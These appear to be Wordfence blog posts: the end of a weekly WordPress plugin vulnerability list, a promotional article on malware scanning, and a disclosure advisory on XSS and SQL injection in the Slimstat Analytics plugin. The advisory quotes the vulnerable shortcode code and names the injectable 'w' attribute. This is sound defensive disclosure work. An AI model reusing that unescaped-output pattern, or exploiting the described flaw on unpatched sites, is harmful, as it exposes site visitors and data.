Affected Software: SendPress Newsletters
CVE ID: CVE-2023-41729
CVSS Score: 4.4 (Medium)
Researcher/s: yuyudhn
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/5d173077-06c4-4a23-a664-0be8516053ec

Swifty Bar, sticky bar by WPGens <= 1.2.10 – Authenticated (Administrator+) Stored Cross-Site Scripting

Affected Software: Swifty Bar, sticky bar by WPGens
CVE ID: CVE-2023-41737
CVSS Score: 4.4 (Medium)
Researcher/s: Rio Darmawan
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/66c90387-af23-48fc-94da-708b9c223fe3

wordpress publish post email notification <= 1.0.2.2 – Authenticated (Administrator+) Stored Cross-Site Scripting

Affected Software: wordpress publish post email notification
CVE ID: CVE-2023-41731
CVSS Score: 4.4 (Medium)
Researcher/s: Rio Darmawan
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/705d11b1-0924-46ae-a6e6-8fab16a4df00

iFolders <= 1.5.0 – Authenticated (Administrator+) Stored Cross-Site Scripting

Affected Software: iFolders – Ultimate Folder Manager for Media, Pages, Posts & etc
CVE ID: CVE-2023-41949
CVSS Score: 4.4 (Medium)
Researcher/s: emad
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/d1f957ce-7bb0-4701-8b2a-522211c408d8

Order Delivery Date for WP e-Commerce <= 1.2 – Authenticated (Administrator+) Stored Cross-Site Scripting

Affected Software: Order Delivery Date for WP e-Commerce
CVE ID: CVE-2023-41859
CVSS Score: 4.4 (Medium)
Researcher/s: Rio Darmawan
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/d74f5813-cf7a-4ffb-9306-56f29b3a7d04

Email posts to subscribers <= 6.2 – Authenticated (Administrator+) Stored Cross-Site Scripting

Affected Software: Email posts to subscribers
CVE ID: CVE-2023-41736
CVSS Score: 4.4 (Medium)
Researcher/s: Rafshanzani Suhada
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/e818a5db-acb7-4b16-80b1-939904e93791

Back To The Top Button <= 2.1.5 – Authenticated (Administrator+) Stored Cross-Site Scripting

Affected Software: Back To The Top Button
CVE ID: CVE-2023-41733
CVSS Score: 4.4 (Medium)
Researcher/s: Rio Darmawan
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/ed8cd92a-c791-4781-a7bc-9b2a4d559d7d

Regpack <= 0.1 – Authenticated (Administrator+) Stored Cross-Site Scripting

Affected Software: Regpack
CVE ID: CVE-2023-41855
CVSS Score: 4.4 (Medium)
Researcher/s: Pavitra Tiwari
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/f3cdc0ba-d28f-488c-a703-f9d880f0582e

Backup Migration <= 1.2.9 – Cross-Site Request Forgery

Affected Software: BackupBliss – Backup Migration Staging
CVE ID: CVE Unknown
CVSS Score: 4.3 (Medium)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/00274313-9079-4877-b72e-310e312aa814

Automatic YouTube Gallery <= 2.3.3 – Missing Authorization via AJAX actions

Affected Software: Automatic YouTube Gallery
CVE ID: CVE-2023-41866
CVSS Score: 4.3 (Medium)
Researcher/s: Rafshanzani Suhada
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/0a58d45b-c91b-4141-992e-336650d7252b

rtMedia for WordPress, BuddyPress and bbPress <= 4.6.14 – Missing Authorization via export_settings

Affected Software: rtMedia for WordPress, BuddyPress and bbPress
CVE ID: CVE-2023-41951
CVSS Score: 4.3 (Medium)
Researcher/s: thiennv
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/0cb5df54-a6a7-4c2e-8df0-5d050218622e

Super Socializer <= 7.13.54 – Missing Authorization

Affected Software: Social Share, Social Login and Social Comments Plugin – Super Socializer
CVE ID: CVE-2023-41802
CVSS Score: 4.3 (Medium)
Researcher/s: Rafshanzani Suhada
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/101dd211-c3eb-4d27-9194-841bc2a968e6

Laposta Signup Embed <= 1.1.0 – Missing Authorization

Affected Software: Laposta Signup Embed
CVE ID: CVE Unknown
CVSS Score: 4.3 (Medium)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/12b81441-d22c-4211-a8da-811182de622d

CP Blocks <= 1.0.20 – Cross-Site Request Forgery to Settings Update

Affected Software: CP Blocks
CVE ID: CVE-2023-41732
CVSS Score: 4.3 (Medium)
Researcher/s: Lana Codes
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/35cd1788-1756-4d03-8f6f-e5e4153e3f4f

Leadster <= 1.1.2 – Cross-Site Request Forgery

Affected Software: Leadster
CVE ID: CVE-2023-41668
CVSS Score: 4.3 (Medium)
Researcher/s: LEE SE HYOUNG
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/361216af-b939-4ac1-ae06-97552d283670

EmbedPress <= 3.8.3 – Cross-Site Request Forgery


Live News <= 1.06 – Cross-Site Request Forgery

Affected Software: Live News
CVE ID: CVE-2023-41669
CVSS Score: 4.3 (Medium)
Researcher/s: LEE SE HYOUNG
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/3ee59570-85c3-4394-bebb-c3f49c08be67

WP Gallery Metabox <= 1.0.0 – Cross-Site Request Forgery

Affected Software: WP Gallery Metabox
CVE ID: CVE-2023-41876
CVSS Score: 4.3 (Medium)
Researcher/s: Skalucy
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/46c4b7f7-e3e6-46b8-b959-07775db8bb6c

wpCentral <= 1.5.7 – Cross-Site Request Forgery

Affected Software: wpCentral
CVE ID: CVE-2023-41854
CVSS Score: 4.3 (Medium)
Researcher/s: Rio Darmawan
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/49d03254-7399-4a5d-9ce9-7d4736b8b2ee

Laposta Signup Embed <= 1.1.0 – Cross-Site Request Forgery

Affected Software: Laposta Signup Embed
CVE ID: CVE Unknown
CVSS Score: 4.3 (Medium)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/4c0cbf44-f6b4-408d-9a96-98f45d890822

POEditor <= 0.9.4 – Cross-Site Request Forgery

Affected Software: POEditor
CVE ID: CVE-2023-32091
CVSS Score: 4.3 (Medium)
Researcher/s: Elliot
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/4e81e947-4892-4028-8a09-6a048bf6a572

Carousel Slider <= 2.2.2 – Missing Authorization

Affected Software: Carousel Slider
CVE ID: CVE-2023-41848
CVSS Score: 4.3 (Medium)
Researcher/s: Nguyen Anh Tien
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/5465eaab-03c0-438a-8553-c1f8b06b82bc

SIS Handball <= 1.0.45 – Cross-Site Request Forgery

Affected Software: SIS Handball
CVE ID: CVE-2023-41684
CVSS Score: 4.3 (Medium)
Researcher/s: Mika
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/5973afaa-5a64-4db1-8e32-3b39d1367eb8

Bulk NoIndex & NoFollow Toolkit <= 1.5 – Missing Authorization

Affected Software: Bulk NoIndex & NoFollow Toolkit
CVE ID: CVE-2023-41688
CVSS Score: 4.3 (Medium)
Researcher/s: Skalucy
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/5cb79fbc-705a-4fb4-b441-7fe7ab6dea10

rtMedia for WordPress, BuddyPress and bbPress <= 4.6.14 – Missing Authorization to Settings Update

Affected Software: rtMedia for WordPress, BuddyPress and bbPress
CVE ID: CVE Unknown
CVSS Score: 4.3 (Medium)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/5dfc145e-d2d4-4137-a5c6-dec2ebb41876

WP-dTree <= 4.4.5 – Cross-Site Request Forgery

Affected Software: WP-dTree
CVE ID: CVE-2023-41667
CVSS Score: 4.3 (Medium)
Researcher/s: LEE SE HYOUNG
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/61808624-b2c7-4e86-b5a1-56f32fca9eaa

Realbig <= 1.0.2 – Cross-Site Request Forgery

Affected Software: Realbig For WordPress
CVE ID: CVE-2023-41694
CVSS Score: 4.3 (Medium)
Researcher/s: Mika
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/70ae0f3e-75a8-41c7-91c0-52d672809835

Order Delivery Date for WP e-Commerce <= 1.2 – Cross-Site Request Forgery

Affected Software: Order Delivery Date for WP e-Commerce
CVE ID: CVE-2023-41858
CVSS Score: 4.3 (Medium)
Researcher/s: Rio Darmawan
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/74a74817-30ff-42ec-9bd4-7d0638d6643c

Click To Tweet <= 2.0.14 – Missing Authorization

Affected Software: Click To Tweet
CVE ID: CVE-2023-41857
CVSS Score: 4.3 (Medium)
Researcher/s: thiennv
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/7f765327-3872-46cc-a4f9-40219bf0dd99

Outbound Link Manager <= 1.2 – Cross-Site Request Forgery

Affected Software: Outbound Link Manager
CVE ID: CVE-2023-41850
CVSS Score: 4.3 (Medium)
Researcher/s: Rio Darmawan
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/8dfc0d5e-bdc4-4f71-8aa3-0a4fbd7ef37d

Analytify Dashboard <= 5.1.0 – Missing Authorization to Opt-In

Affected Software: Analytify – Google Analytics Dashboard For WordPress (GA4 made easy)
CVE ID: CVE-2023-41695
CVSS Score: 4.3 (Medium)
Researcher/s: Abdi Pranata
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/970b3a0f-c1cc-4d85-8271-a523ccdbcc39

AWP Classifieds <= 4.3 – Cross-Site Request Forgery

Affected Software: WordPress Classifieds Plugin – Ad Directory & Listings by AWP Classifieds
CVE ID: CVE-2023-41801
CVSS Score: 4.3 (Medium)
Researcher/s: Mika
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/b06a1b66-9057-4f16-878c-4fa66489f0ff

Use Memcached <= 1.0.5 – Cross-Site Request Forgery

Affected Software: Use Memcached
CVE ID: CVE-2023-41670
CVSS Score: 4.3 (Medium)
Researcher/s: Nguyen Xuan Chien
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/b63f4de2-32e1-4c5e-a64d-fb66d2e2b3a8

WP Custom Post Template <= 1.0 – Cross-Site Request Forgery

Affected Software: WP Custom Post Template
CVE ID: CVE-2023-41851
CVSS Score: 4.3 (Medium)
Researcher/s: Rio Darmawan
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/b796b514-b6ca-4a22-9340-df02fec97075

Laposta Signup Basic <= 1.4.1 – Missing Authorization

Affected Software: Laposta Signup Basic
CVE ID: CVE Unknown
CVSS Score: 4.3 (Medium)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/b7e417c2-bf9c-4c88-be2b-9c2324897b07

WP Accessibility Helper (WAH) <= 0.6.2.4 – Missing Authorization via AJAX action

Affected Software: WP Accessibility Helper (WAH)
CVE ID: CVE-2023-41869
CVSS Score: 4.3 (Medium)
Researcher/s: thiennv
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/b97b84a8-cf4e-4648-8d58-b81a71b7988c

Hide admin notices – Admin Notification Center <= 2.3.2 – Cross-Site Request Forgery

Affected Software: Hide admin notices – Admin Notification Center
CVE ID: CVE-2023-41672
CVSS Score: 4.3 (Medium)
Researcher/s: Nguyen Xuan Chien
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/b98c5623-15fe-4937-9a0e-770aa0ab06f3

WP iCal Availability <= 1.0.3 – Cross-Site Request Forgery

Affected Software: WP iCal Availability
CVE ID: CVE-2023-41853
CVSS Score: 4.3 (Medium)
Researcher/s: Mika
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/bc3f1d4e-84f7-4878-8b06-10444caa7dcf

Super Socializer <= 7.13.54 – Cross-Site Request Forgery

Affected Software: Social Share, Social Login and Social Comments Plugin – Super Socializer
CVE ID: CVE-2023-41802
CVSS Score: 4.3 (Medium)
Researcher/s: Rafshanzani Suhada
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/bc6cfad1-d23a-4a96-9d6c-841b6d795a01

rtMedia for WordPress, BuddyPress and bbPress <= 4.6.14 – Missing Authorization to Sensitive Information Exposure

Affected Software: rtMedia for WordPress, BuddyPress and bbPress
CVE ID: CVE Unknown
CVSS Score: 4.3 (Medium)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/be837a77-9b25-43af-aaba-94a8aa59e7e3

SAML SP Single Sign On <= 5.0.4 – Missing Authorization to notice dismissal

Affected Software: SAML Single Sign On – SSO Login Standard
CVE ID: CVE-2023-41873
CVSS Score: 4.3 (Medium)
Researcher/s: Abdi Pranata
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/c3114906-fac1-42b9-9ba1-0a5d44c2fb3a

WP Crowdfunding <= 2.1.4 – Missing Authorization via settings_reset

Affected Software: WP Crowdfunding
CVE ID: CVE-2023-41870
CVSS Score: 4.3 (Medium)
Researcher/s: Elliot
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/cddf4aa1-5c7d-4aa1-9384-1c352f0c6da9

Laposta Signup Basic <= 1.4.1 – Cross-Site Request Forgery

Affected Software: Laposta Signup Basic
CVE ID: CVE-2023-41950
CVSS Score: 4.3 (Medium)
Researcher/s: Nguyen Xuan Chien
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/d1ba4b18-ff46-45ef-b7d4-0a314cf2d74c

Duplicate Post Page Menu & Custom Post Type <= 2.3.1 – Missing Authorization to Post Duplication

Affected Software: Duplicate Post Page Menu & Custom Post Type
CVE ID: CVE-2023-4792
CVSS Score: 4.3 (Medium)
Researcher/s: Marco Wotschka
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/d6bb08e8-9ef5-41db-a111-c377a5dfae77

ProfilePress <= 4.13.1 – Cross-Site Request Forgery via ‘admin_notice’


WP Crowdfunding <= 2.1.5 – Cross-Site Request Forgery

Affected Software: WP Crowdfunding
CVE ID: CVE Unknown
CVSS Score: 4.3 (Medium)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/e4dc8f18-d990-4e41-8bf8-dfa9de4c0f6e

MyCryptoCheckout <= 2.125 – Cross-Site Request Forgery

Affected Software: MyCryptoCheckout – Bitcoin, Ethereum, and 100+ altcoins for WooCommerce
CVE ID: CVE-2023-41693
CVSS Score: 4.3 (Medium)
Researcher/s: qilin_99
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/e5575725-99ba-4499-93e5-f7648c82ac52

Starter Templates <= 3.2.5 – Incorrect Authorization

Affected Software/s: Starter Templates — Elementor, WordPress & Beaver Builder Templates, Premium Starter Templates
CVE ID: CVE-2023-41805
CVSS Score: 4.3 (Medium)
Researcher/s: Rafie Muhammad
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/ebd78e52-f20d-42be-8f68-3d09d5abf837

Easy Form by AYS <= 1.3.8 – Cross-Site Request Forgery

Affected Software: Easy Form by AYS
CVE ID: CVE Unknown
CVSS Score: 4.3 (Medium)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/ee595f48-b72f-4569-a248-7dbd0b9152ae

MailMunch – Grow your Email List <= 3.1.2 – Cross-Site Request Forgery

Affected Software: MailMunch – Grow your Email List
CVE ID: CVE-2023-41852
CVSS Score: 4.3 (Medium)
Researcher/s: Abdi Pranata
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/f6409626-c8cb-412c-aff3-cbb2da212e5d

Slider Pro <= 4.8.6 – Missing Authorization via AJAX actions

Affected Software: Slider Pro
CVE ID: CVE-2023-41865
CVSS Score: 4.3 (Medium)
Researcher/s: Abdi Pranata
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/f813cb1a-5922-48a5-a026-66ec9aaac294

SendPress Newsletters <= 1.22.3.31 – Cross-Site Request Forgery

Affected Software: SendPress Newsletters
CVE ID: CVE-2023-41730
CVSS Score: 4.3 (Medium)
Researcher/s: yuyudhn
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/fb70339c-0f1a-4acc-af7a-8a0320fdfe71

Directorist <= 7.7.1 – CSV Injection

Affected Software: Directorist – WordPress Business Directory Plugin with Classified Ads Listings
CVE ID: CVE-2023-41798
CVSS Score: 3.8 (Low)
Researcher/s: Rafshanzani Suhada
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/ab233ceb-270c-4694-9cf9-2de8ddfcbbfd

Modula <= 2.7.4 – Incomplete Authorization via ‘save_image’ and ‘save_images’

Affected Software: Customizable WordPress Gallery Plugin – Modula Image Gallery
CVE ID: CVE Unknown
CVSS Score: 2.2 (Low)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/f029bd86-d979-45d1-97fe-75c43fb71148

As a reminder, Wordfence has curated an industry leading vulnerability database with all known WordPress core, theme, and plugin vulnerabilities known as Wordfence Intelligence.

This database is continuously updated, maintained, and populated by Wordfence’s highly credentialed and experienced vulnerability researchers through in-house vulnerability research, vulnerability researchers submitting directly to us using our CVE Request form, and by monitoring various sources to capture all publicly available WordPress vulnerability information and adding additional context where we can.

Click here to sign-up for our mailing list to receive weekly vulnerability reports like this and important WordPress Security reports in your inbox the moment they are published.

The post Wordfence Intelligence Weekly WordPress Vulnerability Report (September 4, 2023 to September 10, 2023) appeared first on Wordfence.

Malware Scanning: An Essential Layer of Website Security

Wordfence recently launched Wordfence CLI, a high performance command line malware scanner, which makes use of our extensive set of malware detection signatures to rapidly scan file systems for infections.

In recent years, the WordPress community has seen a shift in emphasis towards prevention, rather than detection, of security incidents. This reflects the increased adoption of best practices such as multi-factor authentication, vulnerability management, and configuration hardening.

While we agree that prevention is always better than detection or remediation, one important concept in cybersecurity is defense in depth, so it’s important to have a well thought-out incident response plan and adequate security monitoring in place. No security solution provides perfect protection against zero-day vulnerabilities, and even a fully locked-down site can be compromised if it shares resources with other sites that remain vulnerable. In today’s article, we’ll discuss our philosophy for securing websites, including several key cybersecurity challenges and concepts and how they relate to the case for malware scanners.


Security Should Serve Users, Not the Other Way Around

There’s an old saying that the best camera is the one you have on you, and likewise the best security solution is the one you’ll actually use. Users add to the complexity of securing systems; it is easy to secure a system so thoroughly locked down that nobody wants to use it. Security that’s easy to use and difficult to bypass is far better than security that’s difficult to use and impossible to bypass, and one guiding philosophy of cybersecurity is that nothing is truly impossible to bypass.

That’s why Wordfence prioritizes the user experience and strives to incorporate as many layers of security as possible into a package that’s easy to use for the vast majority of WordPress site owners. Traditionally this has meant plugin-based offerings. Despite the limitations of running security as a plugin, our many features, including our Web Application Firewall, Two Factor Authentication, Real-Time IP Blocklist, and Malware and Vulnerability scanner help secure over 4 million sites, detect millions of malicious files, and block billions of attacks each year.

In our 2022 Wordfence State of WordPress Security Report, we reported that our firewall blocked more than 159 Billion credential stuffing attacks, 23 Billion configuration scans, and about 12 billion attacks against vulnerabilities. You can also get a real-time view of the volume of attacks we are blocking on the Wordfence Intelligence Dashboard.


Assume Breach Mindset

While it might seem pessimistic, “assume breach” is a critical mindset in cybersecurity that involves planning mitigations in case a site is compromised. For many sites, even the most locked down ones, compromise is a matter of when, not if, and rapid detection is key to minimizing the damage. If your site has been compromised, it is important to find out as soon as possible to prevent the attacker from gaining ground and elevating privileges throughout the system. A well thought-out incident response plan is useless if you’re unaware that an incident is occurring.

The SolarWinds breach, for instance, remained undetected for more than a year, allowing threat actors to infect thousands of critical systems via a supply-chain attack. With adequate security monitoring and detection in place, this year-long intrusion could have been caught much sooner and would have reached far fewer systems. It also shows that even organizations striving for the best security can have gaps in coverage through which an attacker breaches their defenses.


Layered Security

No single solution will ever be perfect, and it is not possible to completely eliminate risk, only manage it. One of the most effective ways to manage risk is to layer defenses so that bypassing any one layer does not allow an attacker to take complete control. This is why, for instance, it is important to use both strong passwords and multifactor authentication, and why backups are important but not a replacement for intrusion detection.

Another example is the contrast between cloud-based solutions and our Web Application Firewall: a cloud solution is well suited to providing DDoS protection and blocking some generic attacks, while our WAF benefits from running inside the plugin, where it can block attacks targeted at specific WordPress vulnerabilities without unnecessarily blocking legitimate administrative traffic.

Our team has deployed hundreds of firewall rules that take advantage of our Web Application Firewall’s unique capabilities. Many of the privilege escalation and authentication bypass vulnerabilities we see have parameters and values that require specialized experience and techniques to adequately block. For instance, many privilege escalation vulnerabilities, such as the one we found in the JupiterX Theme, make use of administrative functionality that has been accidentally exposed to low-level users, often via an AJAX action.

With a generic ruleset such as ModSecurity’s, attacks of this type could not be blocked without breaking most site functionality, because the malicious request and a legitimate administrator’s request carry the same action and parameters. Even the most advanced cloud firewalls, which can inspect POST parameters by terminating TLS at the edge, would still block administrative users from performing necessary tasks, since at the edge a request from a legitimate administrator and one from a low-privileged attacker look alike. Thanks to our custom firewall rules, the Wordfence firewall can block this malicious traffic without impacting site functionality, and thanks to our in-house vulnerability research we are often the first to release firewall rules for new critical vulnerabilities.


Trusting Trust

An often overlooked concept in cybersecurity is the problem of “trusting trust.” On any given system, an attacker that can run code can tamper with any other code running at the same privilege level. This is often used as an argument against plugin-based malware scanners and admittedly does present a challenge since any attacker able to compromise a site to the point where they can execute code can run that code at the same level as a plugin.

Many of our users install Wordfence after they have become aware of a breach and successfully use our scanner for remediation. Most malware is still not sophisticated enough to tamper with the scanner, and even malware designed to do so often fails to fully hide its tracks. Additionally, based on our team’s research on WordPress threat actors, many are unwilling or unable to develop their own evasion payloads or to pay the premium for off-the-shelf solutions.

Nonetheless, such tampering is becoming more common, and no plugin-based scanner is immune to it. Our plugin-based scanner still reliably detects an enormous amount of malware, and we have the telemetry to prove it: roughly 1 million sites successfully used Wordfence to clean malware in 2022, based on the total number of sites on which we saw infections compared to the number of sites that remained infected at the end of the year.

Fortunately, even the most cleverly designed file-based malware can’t successfully hide from a scanner it can’t tamper with, and Wordfence CLI is an effective solution for sites that need this extra layer of detection.


Responsible Remediation

When it comes to remediation, a one-size-fits-all approach simply doesn’t work. Many sites have unique needs, custom code, or technical debt. Replacing core WordPress files and plugins with known clean versions can fix many issues, and our scanner offers the option to do this, but many infections will simply reoccur if the root cause is not addressed. Tools to automate remediation can be incredibly useful, but fully automated remediation can cause more problems than it solves while providing a false sense of security – there should always be a human making final remediation decisions. This is why our Wordfence Care and Wordfence Response offerings use skilled analysts to clean your website and get it back into working order, and we highly recommend these services to less experienced site owners, or site owners who simply want to trust the experts to handle remediation.


Continuous Improvement

Our malware signatures are designed to detect not only active infections but also artifacts generated by malware and other indicators of compromise. Our team of specialists constantly monitors new malware variants and we release dozens of new signatures every month to keep up with attackers. Since our signatures use carefully crafted regular expressions, each signature can detect thousands and oftentimes even millions of unique malicious files.

In the spirit of continuous improvement, we’ve launched an additional, user-friendly layer of security with our Wordfence CLI scanner. While it is designed for power users and administrators, it unlocks new possibilities for detection that were not available with our plugin scanner.


More Flexibility with Wordfence CLI

One of the most frequent requests we have received over the years was the ability to run scans programmatically from the command line rather than via the plugin. Not only does this mitigate tampering concerns and deliver a massive performance boost, it also enables extended use cases: you can scan backups outside of the webroot to verify their integrity before restoring them, or scan database exports to hunt for database infections more thoroughly, since scanning live databases tends to be extremely resource-intensive. You can quickly scan only recently modified files by piping the output of the Linux find command to the Wordfence CLI scanner, or exclude signatures from a scan in the rare cases where your custom code matches one of them.

Wordfence CLI is open-source and can be fully customized or forked, and while our basic Free signature set may not be used for commercial purposes, it is designed to detect the most widespread indicators of compromise found on more than 90% of all infected sites. Bear in mind that most infections involve multiple malicious components, so for more comprehensive scanning and remediation, we recommend our Commercial signature set which detects more than 18 million unique malware variants in the wild.

Conclusion

In today’s article, we discussed some key components of our strategy for securing websites, including user experience, layered security, the assumption of breach, the problem of trusting trust, responsible remediation, and our drive for continuous improvement. Our goal is to provide the best security possible for your website, and that means providing security you’ll actually use.

While no single solution offers perfect protection, Wordfence offers prevention, detection, and remediation packages that will significantly improve your security posture while remaining compatible with other solutions. With the launch of Wordfence CLI, it is now possible to scan hundreds or even thousands of sites with a single, competitively priced license, all while conserving server resources.

The post Malware Scanning: An Essential Layer of Website Security appeared first on Wordfence.

Over 100,000 WordPress Websites Affected by XSS and SQLi Vulnerabilities in Slimstat Analytics Plugin

On August 24, 2023, our Wordfence Threat Intelligence team identified and began the responsible disclosure process for a stored Cross-Site Scripting (XSS) vulnerability and a Blind SQL Injection vulnerability in the Slimstat Analytics plugin, which is actively installed on more than 100,000 WordPress websites. These vulnerabilities enable threat actors with contributor-level permissions or higher to inject malicious web scripts into pages, or to append their own SQL to an existing query, through the plugin’s shortcode.

All Wordfence Premium, Wordfence Care, and Wordfence Response customers, as well as those still using the free version of our plugin, are protected against any exploits targeting this vulnerability by the Wordfence firewall’s built-in Cross-Site Scripting and SQL Injection protection.

We contacted VeronaLabs on August 24, 2023, and we received a response on the same day. After providing full disclosure details, the developer released a patch on August 28, 2023. We would like to commend VeronaLabs for their prompt response and timely patch.

We urge users to update their sites with the latest patched version of Slimstat Analytics, version 5.0.10 at the time of this writing, as soon as possible.

Vulnerability Summary from Wordfence Intelligence

Description: Slimstat Analytics <= 5.0.9 – Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Affected Plugin: Slimstat Analytics
Plugin Slug: wp-slimstat
Affected Versions: <= 5.0.9
CVE ID: CVE-2023-4597
CVSS Score: 6.4 (Medium)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Researcher/s: Lana Codes
Fully Patched Version: 5.0.10

The Slimstat Analytics plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘slimstat’ shortcode in versions up to, and including, 5.0.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

Description: Slimstat Analytics <= 5.0.9 – Authenticated (Contributor+) Blind SQL Injection via Shortcode
Affected Plugin: Slimstat Analytics
Plugin Slug: wp-slimstat
Affected Versions: <= 5.0.9
CVE ID: CVE-2023-4598
CVSS Score: 8.8 (High)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Researcher/s: Lana Codes, Chloe Chamberland
Fully Patched Version: 5.0.10

The Slimstat Analytics plugin for WordPress is vulnerable to SQL Injection via the plugin’s shortcode in versions up to, and including, 5.0.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with contributor-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

Technical Analysis

Slimstat Analytics is a WordPress website traffic analytics plugin that offers several features for analyzing and monitoring traffic. It provides a shortcode ([slimstat]) that displays various types of statistics when added to a WordPress page or post.

Unfortunately, insecure implementation of the plugin’s shortcode functionality allows for the injection of arbitrary web scripts into these pages. Examining the code reveals that the shortcode has several types based on the ‘f’ parameter. In vulnerable versions, the ‘top-all’ type does not adequately sanitize the user-supplied ‘w’ attribute, and then fails to escape the ‘class’ output derived from the ‘w’ parameter when it displays the statistics. This makes it possible to inject attribute-based Cross-Site Scripting payloads via the ‘w’ attribute.

public static function slimstat_shortcode($_attributes = '', $_content = '')
{
	extract(shortcode_atts(array(
		'f' => '',    // recent, popular, count, widget
		'w' => '',    // column to use (for recent, popular and count) or widget to use
		's' => ' ',    // separator
		'o' => 0    // offset for counters
	), $_attributes)); // extract() turns the attributes into the local variables $f, $w, $s and $o

	// ... (intervening code omitted; the $output line below is at line 724 of the same method)

	$output = '<ul class="slimstat-shortcode ' . $f . implode('-', $w) . '">' . implode('', $output) . '</ul>';

The slimstat_shortcode method snippet in the wp_slimstat class

This makes it possible for threat actors with contributor-level access to a site to carry out stored XSS attacks. Once a script is injected into a page or post, it will execute each time a user accesses the affected page. While this vulnerability does require that a trusted contributor account is compromised, or that a user be able to register as a contributor, successful threat actors could steal sensitive information, manipulate site content, inject administrative users, edit files, or redirect users to malicious websites which are all severe consequences.
